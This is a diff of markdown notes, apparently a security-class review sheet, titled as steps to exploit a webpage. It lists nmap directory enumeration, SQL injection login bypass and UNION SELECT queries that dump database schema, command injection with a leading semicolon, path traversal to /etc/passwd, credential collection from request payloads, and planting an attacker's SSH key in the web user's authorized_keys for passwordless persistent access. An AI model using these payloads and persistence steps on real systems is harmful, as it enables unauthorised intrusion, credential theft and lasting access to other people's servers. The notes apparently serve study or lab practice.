CEL-240/security/review.md

 # to exploit a webpage:
   nmap --script=http-enum <ip>
-  after nmap you type in the directories found at the search bar (fefwwsfews/img or /admin)
+  after nmap you type in the directories found at the search bar (fefwwsfews/img or /admin) for the login, Aauth bypasss ('or1=1')
+	then inspect and go to network
+	the click the request tab after clicking POST copy past the raw request payload after a ? and possibly but easily collect creds

-  then you generate your key
+  generating your key
       ssh-keygen -t rsa -b 4096
       cat  /.ssh/id_rsa.pub
-      echo "your key from the cat" > /var/www/.ssh/authorized_keys
+      echo "your key from the cat" > /var/www/.ssh/authorized_keys you may need to create the .ssh directory
+            ; mkdir /var/www/.ssh

   then you replace the ssh keys with your own so you dont need a password to get on the box and make sure to create the authorized_keys file in www user with and using the echo command above will place your key in it allowing free ssh usage and no password

-    ; mkdir /var/www/.ssh
-   # on a webpage in the search bar you need a ; before every command
+   # on a webpage in the search bar you need a ; before every command and if its not vulnerable to that try ../../../../../etc/passwd

 ## sql injections
-if brought to a webpage with multiple links or with catalogues use these ' OR 1='1’      will authenticate and bypass a login
+if brought to a webpage with multiple links or with catalogues use these
-# Once we got in, we opened the developer console (inspect) and found a username variable
-# Make sure to click the radio button to see information in RAW format
-# We then copied that variable added a "?" to the url because we are passing information and pasted the variable
-# After doing this we were shown usernames and passwords in that variable
+<thing>' OR 1='1’
 identify columns with <vulnerable item>' UNION SELECT 1,2,3,4,5 #

 <item>' UNION SELECT table_schema,2,table_name,column_name,5 FROM information_schema.columns #